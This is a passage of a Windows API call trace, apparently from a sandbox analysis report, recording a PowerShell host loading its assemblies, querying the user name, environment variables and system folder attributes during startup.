lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.229] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.255] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b2a3df0, nSize=0xed508 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xed508) returned 0x1 [0086.256] GetUserNameW (in: lpBuffer=0x1cf5e0, pcbBuffer=0xed548 | out: lpBuffer="aETAdzjz", pcbBuffer=0xed548) returned 1 [0086.256] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3b069d0*="Registry", lpRawData=0x3b06760) returned 1 [0086.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.258] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b2a3df0, nSize=0xed508 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xed508) returned 0x1 [0086.258] CoTaskMemFree (pv=0x1b2a3df0) [0086.258] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0086.259] GetUserNameW (in: lpBuffer=0x1cf5e0, pcbBuffer=0xed548 | out: lpBuffer="aETAdzjz", pcbBuffer=0xed548) returned 1 [0086.259] CoTaskMemFree (pv=0x1cf5e0) [0086.259] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3b0bd98*="Variable", lpRawData=0x3b0bb28) returned 1 [0086.260] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.260] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.260] CoTaskMemFree (pv=0x1f7410) [0086.277] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.277] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.277] CoTaskMemFree (pv=0x1f7410) [0086.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xecdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0086.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0086.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0086.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xecd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0086.327] CoTaskMemAlloc (cb=0x804) returned 0x1b2a5df0 [0086.327] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b2a5df0, nSize=0xed508 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xed508) returned 0x1 [0086.327] CoTaskMemFree (pv=0x1b2a5df0) [0086.327] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0086.327] GetUserNameW (in: lpBuffer=0x1cf5e0, pcbBuffer=0xed548 | out: lpBuffer="aETAdzjz", pcbBuffer=0xed548) returned 1 [0086.327] CoTaskMemFree (pv=0x1cf5e0) [0086.328] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3b1f960*="Certificate", lpRawData=0x3b1f6f0) returned 1 [0086.334] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.334] CoTaskMemFree (pv=0x1f7410) [0086.337] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xed190, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0086.337] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0086.339] CoTaskMemFree (pv=0x1ee390) [0086.340] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.340] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.340] CoTaskMemFree (pv=0x1f7410) [0086.340] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.340] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.340] CoTaskMemFree (pv=0x1f7410) [0086.350] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.352] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.352] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0086.352] SetErrorMode (uMode=0x1) returned 0x1 [0086.352] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed150 | out: lpFileInformation=0xed150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd859920, ftLastAccessTime.dwHighDateTime=0x1d4d5f8, ftLastWriteTime.dwLowDateTime=0xd859920, ftLastWriteTime.dwHighDateTime=0x1d4d5f8, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0086.352] SetErrorMode (uMode=0x1) returned 0x1 [0086.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0086.353] SetErrorMode (uMode=0x1) returned 0x1 [0086.353] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed150 | out: lpFileInformation=0xed150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd859920, ftLastAccessTime.dwHighDateTime=0x1d4d5f8, ftLastWriteTime.dwLowDateTime=0xd859920, ftLastWriteTime.dwHighDateTime=0x1d4d5f8, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0086.353] SetErrorMode (uMode=0x1) returned 0x1 [0086.353] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0086.358] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0086.358] SetErrorMode (uMode=0x1) returned 0x1 [0086.358] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed110 | out: lpFileInformation=0xed110*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0086.358] SetErrorMode (uMode=0x1) returned 0x1 [0086.358] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0086.358] SetErrorMode (uMode=0x1) returned 0x1 [0086.358] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xed110 | out: lpFileInformation=0xed110*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0086.358] SetErrorMode (uMode=0x1) returned 0x1 [0086.358] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0086.359] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xece00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0086.359] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xecf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0086.359] SetErrorMode (uMode=0x1) returned 0x1 [0086.359] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xed110 | out: lpFileInformation=0xed110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdc77c7e0, ftLastAccessTime.dwHighDateTime=0x1d4d5d9, ftLastWriteTime.dwLowDateTime=0xdc77c7e0, ftLastWriteTime.dwHighDateTime=0x1d4d5d9, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0086.359] SetErrorMode (uMode=0x1) returned 0x1 [0086.359] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xecf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0086.359] SetErrorMode (uMode=0x1) returned 0x1 [0086.359] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xed110 | out: lpFileInformation=0xed110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdc77c7e0, ftLastAccessTime.dwHighDateTime=0x1d4d5d9, ftLastWriteTime.dwLowDateTime=0xdc77c7e0, ftLastWriteTime.dwHighDateTime=0x1d4d5d9, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0086.359] SetErrorMode (uMode=0x1) returned 0x1 [0086.359] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0086.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xece00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0086.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0086.360] SetErrorMode (uMode=0x1) returned 0x1 [0086.360] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed110 | out: lpFileInformation=0xed110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd859920, ftLastAccessTime.dwHighDateTime=0x1d4d5f8, ftLastWriteTime.dwLowDateTime=0xd859920, ftLastWriteTime.dwHighDateTime=0x1d4d5f8, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0086.360] SetErrorMode (uMode=0x1) returned 0x1 [0086.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0086.360] SetErrorMode (uMode=0x1) returned 0x1 [0086.360] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed110 | out: lpFileInformation=0xed110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd859920, ftLastAccessTime.dwHighDateTime=0x1d4d5f8, ftLastWriteTime.dwLowDateTime=0xd859920, ftLastWriteTime.dwHighDateTime=0x1d4d5f8, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0086.360] SetErrorMode (uMode=0x1) returned 0x1 [0086.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0086.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xece00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0086.360] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0086.360] SetErrorMode (uMode=0x1) returned 0x1 [0086.361] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xed150 | out: lpFileInformation=0xed150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdc77c7e0, ftLastAccessTime.dwHighDateTime=0x1d4d5d9, ftLastWriteTime.dwLowDateTime=0xdc77c7e0, ftLastWriteTime.dwHighDateTime=0x1d4d5d9, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0086.361] SetErrorMode (uMode=0x1) returned 0x1 [0086.361] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0086.361] SetErrorMode (uMode=0x1) returned 0x1 [0086.361] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xed150 | out: lpFileInformation=0xed150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdc77c7e0, ftLastAccessTime.dwHighDateTime=0x1d4d5d9, ftLastWriteTime.dwLowDateTime=0xdc77c7e0, ftLastWriteTime.dwHighDateTime=0x1d4d5d9, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0086.361] SetErrorMode (uMode=0x1) returned 0x1 [0086.361] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0086.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xece40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0086.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0086.361] SetErrorMode (uMode=0x1) returned 0x1 [0086.361] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed150 | out: lpFileInformation=0xed150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd859920, ftLastAccessTime.dwHighDateTime=0x1d4d5f8, ftLastWriteTime.dwLowDateTime=0xd859920, ftLastWriteTime.dwHighDateTime=0x1d4d5f8, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0086.361] SetErrorMode (uMode=0x1) returned 0x1 [0086.361] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0086.362] SetErrorMode (uMode=0x1) returned 0x1 [0086.362] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed150 | out: lpFileInformation=0xed150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd859920, ftLastAccessTime.dwHighDateTime=0x1d4d5f8, ftLastWriteTime.dwLowDateTime=0xd859920, ftLastWriteTime.dwHighDateTime=0x1d4d5f8, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0086.362] SetErrorMode (uMode=0x1) returned 0x1 [0086.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0086.362] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xece40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0086.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xed1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0086.376] SetErrorMode (uMode=0x1) returned 0x1 [0086.376] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xed410 | out: lpFileInformation=0xed410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xd859920, ftLastAccessTime.dwHighDateTime=0x1d4d5f8, ftLastWriteTime.dwLowDateTime=0xd859920, ftLastWriteTime.dwHighDateTime=0x1d4d5f8, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0086.376] SetErrorMode (uMode=0x1) returned 0x1 [0086.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.410] CoTaskMemAlloc (cb=0x804) returned 0x1b2a5df0 [0086.410] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b2a5df0, nSize=0xed778 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xed778) returned 0x1 [0086.411] CoTaskMemFree (pv=0x1b2a5df0) [0086.411] CoTaskMemAlloc (cb=0x204) returned 0x1cf5e0 [0086.411] GetUserNameW (in: lpBuffer=0x1cf5e0, pcbBuffer=0xed7b8 | out: lpBuffer="aETAdzjz", pcbBuffer=0xed7b8) returned 1 [0086.411] CoTaskMemFree (pv=0x1cf5e0) [0086.413] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3b585f8*="Available", lpRawData=0x3b58388) returned 1 [0086.414] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.414] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.414] CoTaskMemFree (pv=0x1f7410) [0086.415] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.415] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="") returned 0x0 [0086.415] CoTaskMemFree (pv=0x1f7410) [0086.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0086.446] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1f7410, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0086.446] CoTaskMemFree (pv=0x1f7410) [0086.446] CoTaskMemAlloc (cb=0x104) returned 0x1f7410 [0086.446] GetEnvironmentVariableW (in: lpName="HomePath", 